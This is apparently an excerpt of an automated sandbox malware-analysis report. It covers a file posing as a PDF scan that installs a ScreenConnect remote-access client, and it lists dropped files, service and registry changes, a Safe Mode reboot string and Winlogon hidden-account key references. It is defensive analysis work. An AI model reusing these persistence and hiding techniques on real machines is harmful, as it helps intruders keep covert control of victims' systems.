                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2588106191.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452815491.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452663213.00000000029F2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452189613.0000000002960000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: Scan_PDF_2017163298.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1388241914.00000000009CD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: Scan_PDF_2017163298.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1362019371.000000000507B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1365337506.0000000004F00000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Scan_PDF_2017163298.exe, 5096ed.msi.3.dr, MSI998C.tmp.3.dr, MSI996C.tmp.3.dr, 5096eb.msi.3.dr, MSI9EDC.tmp.3.dr, setup.msi.0.dr, 5096ec.rbs.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1362019371.000000000500C000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2602218756.0000000002A67000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459208723.0000000012B30000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1401154593.00000000001A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Scan_PDF_2017163298.exe, 5096ed.msi.3.dr, 5096eb.msi.3.dr, MSI9390.tmp.2.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: Scan_PDF_2017163298.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452336633.0000000002992000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: ttResolver.pdb1u source: Scan_PDF_2017163298.exe, 00000000.00000002.1345833223.00000000015F4000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2602218756.0000000002A67000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459208723.0000000012B30000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: Scan_PDF_2017163298.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: Scan_PDF_2017163298.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: Scan_PDF_2017163298.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: Scan_PDF_2017163298.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                              Source: Scan_PDF_2017163298.exeStatic PE information: real checksum: 0x54fd91 should be: 0x56d64e
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeCode function: 0_2_01536F00 push eax; mov dword ptr [esp], ecx0_2_01536F11
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeCode function: 0_2_05A853E8 push eax; retf 0_2_05A854D9
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeCode function: 0_2_05AA2F58 push eax; mov dword ptr [esp], edx0_2_05AA2F6C
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_01167732 push eax; iretd 8_2_01167739
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_01167752 push 8403E4CFh; iretd 8_2_01167759
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05716571 pushfd ; ret 8_2_0571659D
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05711F51 push esp; ret 8_2_05711F63
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05713F41 push esp; ret 8_2_05713F53
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886C374EB push esp; ret 9_2_00007FF886C374EC
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886C3747F push esp; ret 9_2_00007FF886C37480
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886C37413 push esp; ret 9_2_00007FF886C37414
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886C6B40F pushfd ; retf 5F4Ch9_2_00007FF886C6B4C1
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886C6B40F push esp; retf 5F4Ch9_2_00007FF886C6B509
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886C5CB81 push eax; retf 9_2_00007FF886C5CB89
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886C76364 push ss; ret 9_2_00007FF886C76367
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886C57969 push ebx; retf 9_2_00007FF886C5796A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886F4203F push ecx; ret 9_2_00007FF886F42041
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886F420A5 push ecx; ret 9_2_00007FF886F420A7
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886F41B36 push eax; ret 9_2_00007FF886F41B37
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886F41B92 pushfd ; iretd 9_2_00007FF886F41B94
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886F4826D push cs; iretd 9_2_00007FF886F4826E
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886F41ADA push eax; ret 9_2_00007FF886F41ADB
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886F47523 push ebx; iretd 9_2_00007FF886F4756A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886C300AD push ds; iretd 10_2_00007FF886C30262
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886C374EB push esp; ret 10_2_00007FF886C374EC
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886C3747F push esp; ret 10_2_00007FF886C37480
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886C3016D push ds; iretd 10_2_00007FF886C30262
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886F4279F push ss; iretd 10_2_00007FF886F427A6
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886F4AA06 push esi; ret 10_2_00007FF886F4AA07
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886F45ED9 push ecx; ret 10_2_00007FF886F45EDA

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9EDC.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9390.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI998C.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9EDC.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI998C.tmpJump to dropped file
                              Source: ScreenConnect.ClientService.dll.3.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e6cb77284cf765aa)Jump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: Scan_PDF_2017163298.exe, 00000000.00000000.1335059252.0000000000346000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1363945244.0000000005840000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: rundll32.exe, 00000005.00000003.1362019371.0000000005087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2588106191.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452815491.0000000002B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452663213.00000000029F2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452189613.0000000002960000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1462723847.000000001B9F2000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: Scan_PDF_2017163298.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.5.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.ClientService.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
